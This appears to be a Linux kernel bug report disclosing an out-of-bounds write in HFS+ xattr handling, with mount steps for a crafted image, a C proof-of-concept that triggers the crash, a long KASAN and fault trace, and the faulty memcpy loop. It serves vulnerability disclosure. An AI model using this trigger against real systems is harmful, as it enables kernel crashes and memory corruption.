Created attachment 276895 [details] The (compressed) crafted image which causes crash - Reproduce (4.18) # mkdir mnt # mount -t hfsplus 8.img mnt # gcc -o poc poc.c # ./poc ./mnt - POC (poc.c) #define _GNU_SOURCE #include <sys/types.h> #include <sys/mount.h> #include <sys/mman.h> #include <sys/stat.h> #include <sys/xattr.h> #include <dirent.h> #include <errno.h> #include <error.h> #include <fcntl.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <linux/falloc.h> #include <linux/loop.h> static void activity(char *mpoint) { char *xattr; int err; static int buf[8192]; memset(buf, 0, sizeof(buf)); err = asprintf(&xattr, "%s/foo/bar/xattr", mpoint); // xattr char buf2[113]; memset(buf2, 0, sizeof(buf2)); listxattr(xattr, buf2, sizeof(buf2)); removexattr(xattr, "user.mime_type"); setxattr(xattr, "user.md5", buf2, sizeof(buf2), XATTR_CREATE); setxattr(xattr, "user.md5", buf2, sizeof(buf2), XATTR_REPLACE); } int main(int argc, char *argv[]) { activity(argv[1]); return 0; } - Kernel message [ 925.089898] hfsplus: request for non-existent node 5888 in B*Tree [ 925.091299] hfsplus: request for non-existent node 5888 in B*Tree [ 925.092783] ================================================================== [ 925.094367] BUG: KASAN: slab-out-of-bounds in hfsplus_bnode_read+0xb1/0x140 [ 925.095783] Write of size 3922 at addr ffff8801eff06400 by task a.out/1421 [ 925.097521] CPU: 0 PID: 1421 Comm: a.out Not tainted 4.18.0-rc1+ #6 [ 925.097529] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014 [ 925.097535] Call Trace: [ 925.097573] dump_stack+0x7b/0xb5 [ 925.097610] print_address_description+0x70/0x290 [ 925.097616] kasan_report+0x291/0x390 [ 925.097620] ? hfsplus_bnode_read+0xb1/0x140 [ 925.097637] check_memory_region+0x139/0x190 [ 925.097641] memcpy+0x37/0x50 [ 925.097646] hfsplus_bnode_read+0xb1/0x140 [ 925.097652] hfsplus_bnode_read_key+0xfb/0x140 [ 925.097657] ? hfsplus_bnode_read_u8+0xa0/0xa0 [ 925.097679] ? set_page_dirty+0x9c/0x120 [ 925.097685] ? hfsplus_bnode_write+0xc2/0x170 [ 925.097690] hfsplus_brec_insert+0x3e2/0x6c0 [ 925.097696] ? hfsplus_brec_keylen+0x130/0x130 [ 925.097701] ? __kmalloc+0x11f/0x240 [ 925.097707] hfsplus_create_attr+0x263/0x2b0 [ 925.097712] ? hfsplus_attr_exists+0x140/0x140 [ 925.097720] ? strncmp+0x3d/0xc0 [ 925.097725] __hfsplus_setxattr+0x2d5/0x1160 [ 925.097757] ? unwind_get_return_address+0x36/0x50 [ 925.097763] ? kasan_check_write+0x14/0x20 [ 925.097790] ? _raw_spin_lock_irqsave+0x2a/0x60 [ 925.097797] ? hfsplus_getxattr_finder_info.isra.5+0x280/0x280 [ 925.097802] ? save_stack+0x46/0xd0 [ 925.097805] ? kasan_kmalloc+0xad/0xe0 [ 925.097809] ? kmem_cache_alloc_trace+0x102/0x200 [ 925.097814] ? hfsplus_setxattr+0x4c/0xb0 [ 925.097818] ? hfsplus_user_setxattr+0x27/0x30 [ 925.097831] ? __vfs_setxattr+0x7c/0xa0 [ 925.097835] ? __vfs_setxattr_noperm+0x8d/0x200 [ 925.097839] ? vfs_setxattr+0xb3/0xc0 [ 925.097846] ? setxattr+0x1b3/0x260 [ 925.097851] ? path_setxattr+0x134/0x170 [ 925.097855] ? __x64_sys_setxattr+0x6d/0x80 [ 925.097869] ? do_syscall_64+0x78/0x170 [ 925.097874] ? entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 925.097879] ? save_stack+0xb5/0xd0 [ 925.097883] ? save_stack+0x46/0xd0 [ 925.097886] ? kasan_kmalloc+0xad/0xe0 [ 925.097890] ? __kmalloc_node+0x11e/0x2e0 [ 925.097903] ? kvmalloc_node+0x31/0x80 [ 925.097907] ? setxattr+0x114/0x260 [ 925.097911] ? path_setxattr+0x134/0x170 [ 925.097914] ? __x64_sys_setxattr+0x6d/0x80 [ 925.097918] ? do_syscall_64+0x78/0x170 [ 925.097923] ? entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 925.097926] ? save_stack+0xb5/0xd0 [ 925.097930] ? save_stack+0x46/0xd0 [ 925.097933] ? __kasan_slab_free+0x13c/0x1a0 [ 925.097936] ? kasan_slab_free+0xe/0x10 [ 925.097940] ? kmem_cache_free+0x89/0x1e0 [ 925.097949] ? putname+0x80/0x90 [ 925.097953] ? filename_lookup+0x191/0x280 [ 925.097957] ? kasan_unpoison_shadow+0x36/0x50 [ 925.097961] ? kasan_kmalloc+0xad/0xe0 [ 925.097966] ? kmem_cache_alloc_trace+0x102/0x200 [ 925.097972] hfsplus_setxattr+0x8a/0xb0 [ 925.097976] hfsplus_user_setxattr+0x27/0x30 [ 925.097980] __vfs_setxattr+0x7c/0xa0 [ 925.097985] __vfs_setxattr_noperm+0x8d/0x200 [ 925.097989] vfs_setxattr+0xb3/0xc0 [ 925.097994] setxattr+0x1b3/0x260 [ 925.097998] ? vfs_setxattr+0xc0/0xc0 [ 925.098001] ? filename_lookup+0x191/0x280 [ 925.098005] ? filename_parentat+0x2b0/0x2b0 [ 925.098010] ? kasan_kmalloc+0xad/0xe0 [ 925.098015] ? kasan_check_write+0x14/0x20 [ 925.098039] ? strncpy_from_user+0xa8/0x1c0 [ 925.098052] ? __mnt_is_readonly.part.13+0x23/0x30 [ 925.098057] ? __mnt_want_write+0x9d/0xb0 [ 925.098062] path_setxattr+0x134/0x170 [ 925.098066] ? setxattr+0x260/0x260 [ 925.098076] ? vm_brk+0x20/0x20 [ 925.098081] __x64_sys_setxattr+0x6d/0x80 [ 925.098086] do_syscall_64+0x78/0x170 [ 925.098091] entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 925.098114] RIP: 0033:0x7f5b520391fa [ 925.098115] Code: 48 8b 0d a1 dc 2b 00 f7 d8 64 89 01 48 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 49 89 ca b8 bc 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 6e dc 2b 00 f7 d8 64 89 01 48 [ 925.098177] RSP: 002b:00007ffcadce8fb8 EFLAGS: 00000206 ORIG_RAX: 00000000000000bc [ 925.098186] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f5b520391fa [ 925.098189] RDX: 00007ffcadce8fe0 RSI: 00000000004008a4 RDI: 0000000001e1b080 [ 925.098191] RBP: 00007ffcadce9060 R08: 0000000000000001 R09: 0000000000000000 [ 925.098194] R10: 0000000000000071 R11: 0000000000000206 R12: 00000000004005e0 [ 925.098196] R13: 00007ffcadce9160 R14: 0000000000000000 R15: 0000000000000000 [ 925.098546] Allocated by task 1421: [ 925.099280] save_stack+0x46/0xd0 [ 925.099284] kasan_kmalloc+0xad/0xe0 [ 925.099288] __kmalloc+0x11f/0x240 [ 925.099292] hfsplus_find_init+0x54/0xc0 [ 925.099296] hfsplus_create_attr+0x10c/0x2b0 [ 925.099300] __hfsplus_setxattr+0x2d5/0x1160 [ 925.099304] hfsplus_setxattr+0x8a/0xb0 [ 925.099308] hfsplus_user_setxattr+0x27/0x30 [ 925.099311] __vfs_setxattr+0x7c/0xa0 [ 925.099314] __vfs_setxattr_noperm+0x8d/0x200 [ 925.099318] vfs_setxattr+0xb3/0xc0 [ 925.099321] setxattr+0x1b3/0x260 [ 925.099324] path_setxattr+0x134/0x170 [ 925.099327] __x64_sys_setxattr+0x6d/0x80 [ 925.099331] do_syscall_64+0x78/0x170 [ 925.099336] entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 925.099671] Freed by task 0: [ 925.100274] (stack is not available) [ 925.101346] The buggy address belongs to the object at ffff8801eff06400 which belongs to the cache kmalloc-1024 of size 1024 [ 925.103925] The buggy address is located 0 bytes inside of 1024-byte region [ffff8801eff06400, ffff8801eff06800) [ 925.106280] The buggy address belongs to the page: [ 925.107281] page:ffffea0007bfc100 count:1 mapcount:0 mapping:ffff8801f6802c40 index:0x0 compound_mapcount: 0 [ 925.109289] flags: 0x2ffff0000008100(slab|head) [ 925.110247] raw: 02ffff0000008100 dead000000000100 dead000000000200 ffff8801f6802c40 [ 925.111811] raw: 0000000000000000 00000000800e000e 00000001ffffffff 0000000000000000 [ 925.113374] page dumped because: kasan: bad access detected [ 925.114846] Memory state around the buggy address: [ 925.115822] ffff8801eff06500: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [ 925.117269] ffff8801eff06580: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [ 925.118738] >ffff8801eff06600: 00 00 00 fc fc fc fc fc fc fc fc fc fc fc fc fc [ 925.120199] ^ [ 925.121025] ffff8801eff06680: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc [ 925.122497] ffff8801eff06700: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc [ 925.123955] ================================================================== [ 925.125422] Disabling lock debugging due to kernel taint [ 925.125610] general protection fault: 0000 [#1] SMP KASAN PTI [ 925.126835] CPU: 0 PID: 1421 Comm: a.out Tainted: G B 4.18.0-rc1+ #6 [ 925.128393] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014 [ 925.130438] RIP: 0010:__memcpy+0x12/0x20 [ 925.131255] Code: 5b 41 5c 41 5d 5d c3 48 89 df e8 59 f6 ff ff eb c9 90 90 90 90 90 90 90 66 66 90 66 90 48 89 f8 48 89 d1 48 c1 e9 03 83 e2 07 <f3> 48 a5 89 d1 f3 a4 c3 66 0f 1f 44 00 00 48 89 f8 48 89 d1 f3 a4 [ 925.135067] RSP: 0018:ffff8801dfbff490 EFLAGS: 00010246 [ 925.136131] RAX: ffff8801eff08352 RBX: 0000000000001000 RCX: 0000000000000200 [ 925.137577] RDX: 0000000000000000 RSI: 580556c000016000 RDI: ffff8801eff08352 [ 925.139034] RBP: ffff8801dfbff4b0 R08: 0000000000000006 R09: ffffed003dfe106a [ 925.140478] R10: 0000000000000006 R11: ffffed003dfe126a R12: ffff8801eff08352 [ 925.141925] R13: 580556c000016000 R14: ffff8801eff08352 R15: 000000000000d7b0 [ 925.143365] FS: 00007f5b52518700(0000) GS:ffff8801f6e00000(0000) knlGS:0000000000000000 [ 925.144989] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 925.146163] CR2: 0000000001e1b008 CR3: 00000001deb04000 CR4: 00000000000006f0 [ 925.147611] Call Trace: [ 925.148133] ? memcpy+0x45/0x50 [ 925.148788] hfsplus_bnode_read+0x129/0x140 [ 925.149650] hfsplus_bnode_read_key+0xfb/0x140 [ 925.157205] ? hfsplus_bnode_read_u8+0xa0/0xa0 [ 925.158142] ? set_page_dirty+0x9c/0x120 [ 925.158961] ? hfsplus_bnode_write+0xc2/0x170 [ 925.159868] hfsplus_brec_insert+0x3e2/0x6c0 [ 925.160755] ? hfsplus_brec_keylen+0x130/0x130 [ 925.161676] ? __kmalloc+0x11f/0x240 [ 925.162433] hfsplus_create_attr+0x263/0x2b0 [ 925.163319] ? hfsplus_attr_exists+0x140/0x140 [ 925.164238] ? strncmp+0x3d/0xc0 [ 925.164914] __hfsplus_setxattr+0x2d5/0x1160 [ 925.165806] ? unwind_get_return_address+0x36/0x50 [ 925.166795] ? kasan_check_write+0x14/0x20 [ 925.167645] ? _raw_spin_lock_irqsave+0x2a/0x60 [ 925.168579] ? hfsplus_getxattr_finder_info.isra.5+0x280/0x280 [ 925.169784] ? save_stack+0x46/0xd0 [ 925.170515] ? kasan_kmalloc+0xad/0xe0 [ 925.171299] ? kmem_cache_alloc_trace+0x102/0x200 [ 925.172273] ? hfsplus_setxattr+0x4c/0xb0 [ 925.173107] ? hfsplus_user_setxattr+0x27/0x30 [ 925.174035] ? __vfs_setxattr+0x7c/0xa0 [ 925.174831] ? __vfs_setxattr_noperm+0x8d/0x200 [ 925.175766] ? vfs_setxattr+0xb3/0xc0 [ 925.176529] ? setxattr+0x1b3/0x260 [ 925.177256] ? path_setxattr+0x134/0x170 [ 925.178081] ? __x64_sys_setxattr+0x6d/0x80 [ 925.178950] ? do_syscall_64+0x78/0x170 [ 925.179751] ? entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 925.180824] ? save_stack+0xb5/0xd0 [ 925.181552] ? save_stack+0x46/0xd0 [ 925.182292] ? kasan_kmalloc+0xad/0xe0 [ 925.183074] ? __kmalloc_node+0x11e/0x2e0 [ 925.183906] ? kvmalloc_node+0x31/0x80 [ 925.184688] ? setxattr+0x114/0x260 [ 925.185418] ? path_setxattr+0x134/0x170 [ 925.186244] ? __x64_sys_setxattr+0x6d/0x80 [ 925.187120] ? do_syscall_64+0x78/0x170 [ 925.187922] ? entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 925.188996] ? save_stack+0xb5/0xd0 [ 925.189728] ? save_stack+0x46/0xd0 [ 925.190471] ? __kasan_slab_free+0x13c/0x1a0 [ 925.191349] ? kasan_slab_free+0xe/0x10 [ 925.192147] ? kmem_cache_free+0x89/0x1e0 [ 925.192978] ? putname+0x80/0x90 [ 925.193654] ? filename_lookup+0x191/0x280 [ 925.194515] ? kasan_unpoison_shadow+0x36/0x50 [ 925.195436] ? kasan_kmalloc+0xad/0xe0 [ 925.196221] ? kmem_cache_alloc_trace+0x102/0x200 [ 925.197194] hfsplus_setxattr+0x8a/0xb0 [ 925.198005] hfsplus_user_setxattr+0x27/0x30 [ 925.198892] __vfs_setxattr+0x7c/0xa0 [ 925.199659] __vfs_setxattr_noperm+0x8d/0x200 [ 925.200560] vfs_setxattr+0xb3/0xc0 [ 925.201294] setxattr+0x1b3/0x260 [ 925.202003] ? vfs_setxattr+0xc0/0xc0 [ 925.202769] ? filename_lookup+0x191/0x280 [ 925.203621] ? filename_parentat+0x2b0/0x2b0 [ 925.204509] ? kasan_kmalloc+0xad/0xe0 [ 925.205295] ? kasan_check_write+0x14/0x20 [ 925.206161] ? strncpy_from_user+0xa8/0x1c0 [ 925.207033] ? __mnt_is_readonly.part.13+0x23/0x30 [ 925.208023] ? __mnt_want_write+0x9d/0xb0 [ 925.208856] path_setxattr+0x134/0x170 [ 925.209636] ? setxattr+0x260/0x260 [ 925.210376] ? vm_brk+0x20/0x20 [ 925.211038] __x64_sys_setxattr+0x6d/0x80 [ 925.211877] do_syscall_64+0x78/0x170 [ 925.212644] entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 925.213683] RIP: 0033:0x7f5b520391fa [ 925.214436] Code: 48 8b 0d a1 dc 2b 00 f7 d8 64 89 01 48 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 49 89 ca b8 bc 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 6e dc 2b 00 f7 d8 64 89 01 48 [ 925.218313] RSP: 002b:00007ffcadce8fb8 EFLAGS: 00000206 ORIG_RAX: 00000000000000bc [ 925.219855] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f5b520391fa [ 925.221306] RDX: 00007ffcadce8fe0 RSI: 00000000004008a4 RDI: 0000000001e1b080 [ 925.222769] RBP: 00007ffcadce9060 R08: 0000000000000001 R09: 0000000000000000 [ 925.224223] R10: 0000000000000071 R11: 0000000000000206 R12: 00000000004005e0 [ 925.225672] R13: 00007ffcadce9160 R14: 0000000000000000 R15: 0000000000000000 [ 925.227149] Modules linked in: snd_hda_codec_generic snd_hda_intel snd_hda_codec snd_hwdep snd_hda_core snd_pcm snd_timer snd i2c_piix4 mac_hid soundcore ib_iser rdma_cm iw_cm ib_cm ib_core iscsi_tcp libiscsi_tcp libiscsi scsi_transport_iscsi raid10 raid456 async_raid6_recov async_memcpy async_pq async_xor async_tx raid1 raid0 multipath linear 8139too qxl drm_kms_helper syscopyarea sysfillrect sysimgblt fb_sys_fops crct10dif_pclmul ttm crc32_pclmul aesni_intel drm aes_x86_64 crypto_simd cryptd glue_helper 8139cp mii pata_acpi floppy [ 925.237067] ---[ end trace 7f5a46c7478f1295 ]--- [ 925.238062] RIP: 0010:__memcpy+0x12/0x20 [ 925.238907] Code: 5b 41 5c 41 5d 5d c3 48 89 df e8 59 f6 ff ff eb c9 90 90 90 90 90 90 90 66 66 90 66 90 48 89 f8 48 89 d1 48 c1 e9 03 83 e2 07 <f3> 48 a5 89 d1 f3 a4 c3 66 0f 1f 44 00 00 48 89 f8 48 89 d1 f3 a4 [ 925.242813] RSP: 0018:ffff8801dfbff490 EFLAGS: 00010246 [ 925.243896] RAX: ffff8801eff08352 RBX: 0000000000001000 RCX: 0000000000000200 [ 925.245328] RDX: 0000000000000000 RSI: 580556c000016000 RDI: ffff8801eff08352 [ 925.246855] RBP: ffff8801dfbff4b0 R08: 0000000000000006 R09: ffffed003dfe106a [ 925.248305] R10: 0000000000000006 R11: ffffed003dfe126a R12: ffff8801eff08352 [ 925.249743] R13: 580556c000016000 R14: ffff8801eff08352 R15: 000000000000d7b0 [ 925.251254] FS: 00007f5b52518700(0000) GS:ffff8801f6e00000(0000) knlGS:0000000000000000 [ 925.252904] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 925.254085] CR2: 0000000001e1b008 CR3: 00000001deb04000 CR4: 00000000000006f0 - Location https://elixir.bootlin.com/linux/v4.18-rc1/source/fs/hfsplus/bnode.c#L38 while ((len -= l) != 0) { buf += l; l = min_t(int, len, PAGE_SIZE); memcpy(buf, kmap(*++pagep), l); kunmap(*pagep); } OOB happens in this memcpy() as KASAN reports. Reported by Wen Xu (wen.xu@gatech.edu) from SSLab at Gatech.